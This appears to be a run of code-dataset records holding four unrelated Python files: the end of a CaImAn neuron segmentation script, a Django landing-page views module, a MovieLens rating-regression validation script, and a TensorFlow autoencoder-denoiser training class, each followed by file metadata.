sniper_mode = True # flag using a CNN to detect new neurons (o/w space correlation is used)\n # init_batch = 200 # number of frames for initialization (presumably from the first file)\n expected_comps = 500 # maximum number of expected components used for memory pre-allocation (exaggerate here)\n # dist_shape_update = True # flag for updating shapes in a distributed way\n # min_num_trial = 10 # number of candidate components per frame\n K = 10 # initial number of components\n # epochs = 2 # number of passes over the data\n show_movie = False # show the movie with the results as the data gets processed\n\n method_init = 'sparse_nmf'\n do_merge = False\n ssub = 1\n tsub = 1\n alpha_snmf = 10e1\n rolling_sum = False\n rf = 256\n p_ssub = 1\n p_tsub = 1\n # Ain = None\n # method_deconvolution = 'oasis'\n border_pix = 0\n # ========================= caiman parameters for boutons ================================================\n\n\n curr_folder = os.path.dirname(os.path.realpath(__file__))\n\n c, dview, n_processes = cm.cluster.setup_cluster(backend='local', n_processes=n_process, single_thread=False)\n\n data_folder = r\"\\\\allen\\programs\\braintv\\workgroups\\nc-ophys\\Jun\\raw_data\\{}-{}-{}\" \\\n r\"\\{}\".format(date_recorded, mouse_id, imaging_mode, data_folder_n)\n\n\n plane_ns = [f for f in os.listdir(data_folder) if\n os.path.isdir(os.path.join(data_folder, f)) and\n f[:5] == 'plane']\n plane_ns.sort()\n print('planes:')\n print('\\n'.join(plane_ns))\n\n for plane_n in plane_ns:\n\n print('\\nsegmenting plane: {}'.format(plane_n))\n\n plane_folder = os.path.join(data_folder, plane_n, channel, 'corrected')\n os.chdir(plane_folder)\n\n fn = [f for f in os.listdir(plane_folder) if len(f) > 16 and f[-5:] == '.mmap']\n if len(fn) > 1:\n print('\\n'.join(fn))\n raise LookupError('more than one file found.')\n elif len(fn) == 0:\n raise LookupError('no file found.')\n else:\n fn = fn[0]\n\n fp = os.path.join(os.path.realpath(plane_folder), fn)\n\n params_dict = {'fnames': [fp],\n # 'fr': fr,\n # 'decay_time': decay_time,\n 'gSig': gSig,\n 'p': p,\n # 'min_SNR': min_SNR,\n # 'rval_thr': rval_thr,\n # 'ds_factor': ds_factor,\n # 'nb': gnb,\n 'motion_correct': mot_corr,\n # 'init_batch': init_batch,\n # 'init_method': 'bare',\n # 'normalize': True,\n 'expected_comps': expected_comps,\n # 'sniper_mode': sniper_mode,\n # 'dist_shape_update': dist_shape_update,\n # 'min_num_trial': min_num_trial,\n 'K': K,\n # 'epochs': epochs,\n # 'max_shifts_online': max_shifts_online,\n 'pw_rigid': pw_rigid,\n 'show_movie': show_movie,\n\n # testing parameters\n 'method_init': method_init,\n 'do_merge': do_merge,\n 'ssub': ssub,\n 'tsub': tsub,\n 'alpha_snmf': alpha_snmf,\n 'rolling_sum': rolling_sum,\n 'rf': rf,\n 'p_ssub': p_ssub,\n 'p_tsub': p_tsub,\n # 'Ain': Ain,\n # 'method_deconvolution': method_deconvolution,\n 'border_pix': border_pix\n }\n\n opts = cnmf.params.CNMFParams(params_dict=params_dict)\n\n cnm1 = cnmf.CNMF(n_process, params=opts, dview=dview)\n cnm1.fit_file(motion_correct=False)\n\n roi_num = cnm1.estimates.A.shape[1]\n print('saving ...')\n save_f = h5py.File('caiman_segmentation_results.hdf5', 'w')\n save_f.create_dataset('masks',\n data=np.array(cnm1.estimates.A.todense()).T.reshape((roi_num, resolution[0], resolution[1]),\n order='F'), compression='lzf')\n save_f.create_dataset('traces', data=cnm1.estimates.C)\n save_f.close()\n\n copyfile(os.path.join(plane_folder, 'caiman_segmentation_results.hdf5'),\n os.path.join(curr_folder, plane_n, 'caiman_segmentation_results.hdf5'))\n\n # %% STOP CLUSTER and clean up log files\n cm.stop_server(dview=dview)\n log_files = glob.glob('*_LOG_*')\n for log_file in log_files:\n os.remove(log_file)\n\n\nif __name__ == '__main__':\n run()\n\n", "sub_path": "NeuroAnalysisTools/scripts/analysis_pipeline_movie/old/caiman_segmentation_bouton_mmap.py", "file_name": "caiman_segmentation_bouton_mmap.py", "file_ext": "py", "file_size_in_byte": 6389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 72, "usage_type": "call"}, {"api_name": "caiman.cluster.setup_cluster", "line_number": 74, "usage_type": "call"}, {"api_name": "caiman.cluster", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 103, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params.CNMFParams", "line_number": 143, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params", "line_number": 143, "usage_type": "attribute"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 143, "usage_type": "name"}, {"api_name": "caiman.source_extraction.cnmf.CNMF", "line_number": 145, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 145, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "caiman.stop_server", "line_number": 161, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 162, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 164, "usage_type": "call"}]}
+{"seq_id": "562859722", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Informer\nfrom landing.cc_forms import SocialForm, EmailCollectForm\n\n# Create your views here.\nipg_slider_list = (\"Смех до слез!\",\n \"Повод собраться с друзьями!\",\n \"Рабы которые создают игры для тебя!\",\n \"Гарантия отличного вечера!\",\n \"Органы по отличной цене!\",\n \"Театр абсурда у тебя дома!\",\n \"Черный юмор в самом соку!\",\n \"Вечные поиски логотипа!\",\n )\nipg_navbar = ((\"Главная\", \"main_page\"),\n \"Игры\",\n (\"Партнеры\", \"partners_list\"),\n (\"Связь\", \"games-contact\")\n )\n\n\ndef info_view(request):\n # Responds for main game lister\n queryset = Informer.objects.all()\n # email forms\n email_collect_form = EmailCollectForm(request.POST or None)\n if request.method == 'POST':\n if email_collect_form.is_valid():\n instance = email_collect_form.save(commit=False)\n instance.save()\n messages.success(request, 'Спасибо!')\n return HttpResponseRedirect('/')\n else:\n email_collect_form = EmailCollectForm()\n\n context = {'obj_list': queryset,\n 'email_form': email_collect_form,\n 'title': 'Main',\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'basetwo.html', context)\n\n\ndef games_contact_form(request):\n # here for header game list\n queryset = Informer.objects.all()\n # social form\n social_form = SocialForm(request.POST or None)\n if request.method == 'POST':\n if social_form.is_valid():\n instance = social_form.save(commit=False)\n instance.save()\n messages.success(request, 'Сообщение отправлено!')\n return HttpResponseRedirect('/contact/')\n else:\n social_form = SocialForm()\n\n context = {'social_form': social_form,\n 'obj_list': queryset,\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'contact.html', context)\n\n", "sub_path": "landing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Informer.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 27, "usage_type": "name"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Informer.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 50, "usage_type": "name"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 57, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "362573624", "text": "#!/bin/env python3 -u\n\n#\n# Tests results of regression from t9a.py\n# andre@corp.insite.com.br - 2017-11-06\n#\n# parameters: t9c.py \n#\n\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport os\nimport time\nimport math\nimport sys\n\nparser = argparse.ArgumentParser(description='Test results of movielens regression.')\nparser.add_argument('logdir', nargs=1, help='directory with data from the tensorflow run')\nparser.add_argument('--ratings', nargs=1, help='file containing ratings to be tested', required = True)\nparser.add_argument('--movies', nargs=1, help='file containing movie info', required = True)\nparser.add_argument('--csvout', nargs=1, help='output file with test results', required = True)\n\n\nargs = parser.parse_args()\nlogdir = args.logdir[0]\nprint(\"Directory: {}\".format(logdir))\n\nsys.stdout = open(logdir + \"/validation.out\", \"w\", 1)\nsys.stderr = sys.stdout\n\nratfile = args.ratings[0]\nprint(\"Ratings File: {}\".format(ratfile))\ncsvout = args.csvout[0]\nprint(\"Output CSV file: {}\".format(csvout))\nmovies_file = args.movies[0]\nprint(\"Movies file: {}\".format(movies_file))\n\n\nif \"linear\" in logdir:\n print(\"Linear activation\")\n t_regression = \"linear\"\nelif \"asigmoid\" in logdir:\n print(\"sigmoid activation\")\n t_regression = \"sigmoid\"\nelse:\n print(\"Hmmm. directory doesn't have a recognized type of regression (sigmoid or linear)\")\n sys.exit(1)\n\nif not os.path.exists(logdir):\n print(\"Diretory doesn't exist\")\n sys.exit(2)\n\nif not os.path.isdir(logdir):\n print(\"{} is not a directory\".format(logdir))\n sys.exit(3)\n\nif not os.path.exists(ratfile):\n print(\"{} does not exist\")\n sys.exit(4)\n\n\nt0 = time.perf_counter()\ndef loga(msg):\n now = time.perf_counter()\n print(\"%6.2f: %s\" % (now - t0, msg))\n\nmemb = pd.read_csv(logdir + \"/movie_embeddings.csv.gz\", header = None)\nloga(\"Movie embeddings: {}\".format(memb.shape))\nuemb = pd.read_csv(logdir + \"/user_embeddings.csv.gz\", header = None)\nloga(\"User embeddings: {}\".format(uemb.shape))\nubias = pd.read_csv(logdir + \"/user_bias.csv.gz\", header=None)\nloga(\"User Bias: {}\".format(ubias.shape))\nmbias = pd.read_csv(logdir + \"/movie_bias.csv.gz\", header=None)\nloga(\"Movie Bias: {}\".format(mbias.shape))\nmovies = pd.read_csv(movies_file)\nloga(\"Movies: {}\".format(movies.shape))\n\nloga(\"Loading ratings...\")\nratings = pd.read_csv(ratfile)\nloga(\"Ratings: {}\".format(ratings.shape))\nuserIds = np.sort(ratings['userId'].unique())\nloga(\"Unique users: {}\".format(userIds.shape))\ncsvfname = logdir + \"/\" + csvout\nprint(\"opening csv output file: {}\".format(csvfname))\noutf=open(csvfname, \"w\", buffering = 1)\n\nnum_features = uemb.shape[1]\nmean_ratings = movies['mean_ratings']\n\nprint('\"context\",\"num_movies\",\"mean_error\",\"mse\"', file=outf)\n#loga(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n# (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n# np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\nfor userId in userIds:\n loga(\"==== userId: {}\".format(userId))\n user_ratings = ratings.loc[ratings['userId'] == userId]\n user_movieIds = user_ratings['movieId'].values\n predicted_ratings = movies.loc[user_movieIds,]['mean_ratings'].values\n actual_ratings = user_ratings['rating'].values\n diff = actual_ratings - predicted_ratings\n print(\"diffs: {}\".format(diff))\n\n old_user_vector = None\n #np.random.shuffle(user_ratings)\n\n validation_movieIds = user_ratings['movieId'].values\n num_movies = validation_movieIds.shape[0]\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(0, num_movies, \n np.mean(diff),\n np.mean(np.square(diff))), file=outf)\n\n for i in range(1, user_ratings.shape[0]):\n seen_movieIds = user_ratings[0:i]['movieId'].values\n validation_movieIds = user_ratings[i:]['movieId'].values\n # NUM_FEATURES x n\n #seen_actual_score = user_ratings[0:i]['rating'].values\n seen_actual_score = np.matrix(user_ratings[0:i]['rating']).T\n # TODO: precisa testar isto...\n seen_memb = memb.loc[seen_movieIds,] # (n, NUM_FEATURES)\n # loga(\"seen_movie embeddings: {}\".format(seen_memb))\n seen_movie_bias = mbias.loc[seen_movieIds].values\n #loga(\"DEBUG: seen_movie_bias: {} ({})\".format(seen_movie_bias, seen_movie_bias.shape))\n inversora = np.linalg.pinv(seen_memb)\n # loga(\"DEBUG: inverter matrix: {}\".format(inversora))\n score_offset = seen_actual_score - seen_movie_bias\n # loga(\"DEBUG: score offset: [{}] ({})\".format(score_offset.T, score_offset.shape))\n\n user_vector = np.matmul(inversora, score_offset)\n seen_user_bias = (score_offset - np.matmul(seen_memb, user_vector)).mean()\n if i == 1:\n rotation = 0\n else:\n loga(\"user_vector shapes: {} and {}\".format(old_user_vector.shape, user_vector.shape))\n rotation = np.matmul(np.transpose(old_user_vector), user_vector)/np.linalg.norm(old_user_vector)/np.linalg.norm(user_vector)\n if num_features > 1:\n try:\n loga(\" change in user vector: {}: {}: norm: {} to {}\".format(rotation, math.acos(rotation)*180/math.pi, np.linalg.norm(old_user_vector), np.linalg.norm(user_vector)))\n except:\n loga(\"Unexpected error:\", sys.exc_info()[0])\n loga(\"{0:f} {1} {2}\".format(rotation, old_user_vector, user_vector))\n\n old_user_vector = user_vector\n \n loga(\"User vector: {} ({}) [{}]\".format(user_vector.T, user_vector.shape, np.linalg.norm(user_vector)))\n #loga(\"DEBUG: shapes: {}, {}\".format(np.matmul(seen_memb, user_vector).shape, seen_movie_bias.shape))\n #loga(\"DEBUG: {}, {}\".format(np.matmul(seen_memb, user_vector), seen_movie_bias))\n seen_predicted_score = np.add(np.matmul(seen_memb, user_vector), seen_movie_bias)\n seen_predicted_score = np.minimum(np.maximum(0.5, seen_predicted_score + seen_user_bias), 5.0)\n loga(\" user bias: {}\".format(seen_user_bias))\n #loga(\" predicted score: {}\".format(predicted_score))\n #loga(\" actual scores: {}\".format(seen_actual_score))\n loga(\" fixed: context: {0} mse: {2:.3f}\".format(i, (np.sum(seen_predicted_score) - np.sum(seen_actual_score))/i, np.sum(np.square(seen_predicted_score - seen_actual_score))/i))\n \n validation_memb = memb.loc[validation_movieIds,].values\n validation_movie_bias = mbias.loc[validation_movieIds].values\n validation_predicted_score = np.minimum(5.0,np.maximum(0.5,np.add(np.add(np.matmul(validation_memb, user_vector), validation_movie_bias), seen_user_bias)))\n validation_actual_score = np.matrix(user_ratings[i:]['rating']).T\n loga(\" predicted: {} {}[t]\".format(validation_predicted_score.shape, np.transpose(validation_predicted_score)))\n loga(\" actual: {} {}[t]\".format(validation_actual_score.shape, validation_actual_score.T))\n validation_error = validation_actual_score - validation_predicted_score\n loga(\" error: {} {}\".format(validation_error.shape, validation_error.T))\n num_movies = validation_movieIds.shape[0]\n loga(\" context: {0} num elements: {1} avg error: {2:.3f} mse: {3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies))\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\n loga(\"---\")\n \n\n", "sub_path": "t9c.py", "file_name": "t9c.py", "file_ext": "py", "file_size_in_byte": 7456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 63, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 135, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 138, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 169, "usage_type": "call"}]}
+{"seq_id": "358276651", "text": "from base.base_train_multi import BaseTrainMulti\nfrom tqdm import tqdm\nimport numpy as np\nfrom time import sleep\nfrom time import time\nfrom utils.evaluations import save_results\n\n\nclass AutoencoderDenoiserTrainer(BaseTrainMulti):\n\n\n def __init__(self, sess, model, data, config, logger):\n super(AutoencoderDenoiserTrainer, self).__init__(sess, model, data, config, logger)\n self.batch_size = self.config.data_loader.batch_size\n self.noise_dim = self.config.trainer.noise_dim\n self.img_dims = self.config.trainer.image_dims\n # Inititalize the train Dataset Iterator\n self.sess.run(self.data.iterator.initializer)\n # Initialize the test Dataset Iterator\n self.sess.run(self.data.test_iterator.initializer)\n if self.config.data_loader.validation:\n self.sess.run(self.data.valid_iterator.initializer)\n self.best_valid_loss = 0\n self.nb_without_improvements = 0\n\n def train_epoch_ae(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n ae_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n ae, sum_ae = self.train_step_ae(image, cur_epoch)\n ae_losses.append(ae)\n summaries.append(sum_ae)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries)\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n feed_dict = {self.model.image_input: image_eval, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_ae, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction])\n ae_m = np.mean(ae_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss AE= {:4f} \".format(\n cur_epoch, time() - begin, ae_m\n )\n )\n self.model.save(self.sess)\n\n def train_epoch_den(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n den_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n den, sum_den = self.train_step_den(image, cur_epoch)\n den_losses.append(den)\n summaries.append(sum_den)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries, summarizer=\"train_den\")\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n noise = np.zeros_like(image_eval)\n feed_dict = {self.model.image_input: image_eval,self.model.noise_tensor: noise, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_den, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction], summarizer=\"train_den\")\n den_m = np.mean(den_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss DEN= {:4f} \".format(\n cur_epoch, time() - begin, den_m\n )\n )\n self.model.save(self.sess)\n\n def train_step_ae(self, image, cur_epoch):\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.is_training_ae: True,\n }\n # Train Autoencoder\n _, lae, sm_ae = self.sess.run(\n [self.model.train_auto_op, self.model.auto_loss, self.model.summary_op_loss_ae],\n feed_dict=feed_dict,\n )\n return lae, sm_ae\n\n\n def train_step_den(self, image, cur_epoch):\n noise = np.random.normal(\n loc=0.0,\n scale=1.0,\n size=[self.config.data_loader.batch_size] + self.config.trainer.image_dims,\n )\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.noise_tensor: noise,\n self.model.is_training_ae: False,\n }\n # Train Denoiser\n _, lden, sm_den = self.sess.run(\n [self.model.train_den_op, self.model.den_loss, self.model.summary_op_loss_den],\n feed_dict=feed_dict,\n )\n return lden, sm_den\n\n def test_epoch(self):\n self.logger.warn(\"Testing evaluation...\")\n scores_rec = []\n scores_den = []\n scores_pipe = []\n scores_pipe_2 = []\n scores_mask1 = []\n scores_mask2 = []\n scores_mask1_s = []\n scores_mask2_s = []\n summaries = []\n inference_time = []\n true_labels = []\n # Create the scores\n test_loop = tqdm(range(self.config.data_loader.num_iter_per_test))\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in test_loop:\n test_batch_begin = time()\n test_batch, test_labels, ground_truth = self.sess.run([self.data.test_image, self.data.test_label, self.data.ground_truth])\n test_loop.refresh() # to show immediately the update\n sleep(0.01)\n feed_dict = {self.model.image_input: test_batch, self.model.ground_truth: ground_truth, self.model.is_training_ae: False}\n scores_rec += self.sess.run(self.model.rec_score, feed_dict=feed_dict).tolist()\n scores_den += self.sess.run(self.model.den_score, feed_dict=feed_dict).tolist()\n scores_pipe += self.sess.run(self.model.pipe_score, feed_dict=feed_dict).tolist()\n scores_pipe_2 += self.sess.run(self.model.pipe_score_2, feed_dict=feed_dict).tolist()\n scores_mask1 += self.sess.run(self.model.mask_score_1, feed_dict=feed_dict).tolist()\n scores_mask2 += self.sess.run(self.model.mask_score_2, feed_dict=feed_dict).tolist()\n scores_mask1_s += self.sess.run(self.model.mask_score_1_s, feed_dict=feed_dict).tolist()\n scores_mask2_s += self.sess.run(self.model.mask_score_2_s, feed_dict=feed_dict).tolist()\n summaries +=self.sess.run([self.model.summary_op_test],feed_dict=feed_dict)\n inference_time.append(time() - test_batch_begin)\n true_labels += test_labels.tolist()\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries,summarizer=\"test\")\n true_labels = np.asarray(true_labels)\n inference_time = np.mean(inference_time)\n self.logger.info(\"Testing: Mean inference time is {:4f}\".format(inference_time))\n scores_rec = np.asarray(scores_rec)\n scores_den = np.asarray(scores_den)\n scores_pipe = np.asarray(scores_pipe)\n scores_pipe_2 = np.asarray(scores_pipe_2)\n scores_mask1 = np.asarray(scores_mask1)\n scores_mask2 = np.asarray(scores_mask2)\n scores_mask1_s = np.asarray(scores_mask1_s)\n scores_mask2_s = np.asarray(scores_mask2_s)\n # scores_scaled = (scores - min(scores)) / (max(scores) - min(scores))\n step = self.sess.run(self.model.global_step_tensor)\n percentiles = np.asarray(self.config.trainer.percentiles)\n save_results(\n self.config.log.result_dir,\n scores_rec,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_rec\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_den,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_den\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_pipe_2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"scores_pipe_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask1_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_1_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n save_results(\n self.config.log.result_dir,\n scores_mask2_s,\n true_labels,\n self.config.model.name,\n self.config.data_loader.dataset_name,\n \"mask_2_s\",\n \"paper\",\n self.config.trainer.label,\n self.config.data_loader.random_seed,\n self.logger,\n step,\n percentile=percentiles,\n )\n\n\n", "sub_path": "trainers/autoencoder_denoiser_trainer.py", "file_name": "autoencoder_denoiser_trainer.py", "file_ext": "py", "file_size_in_byte": 11288, 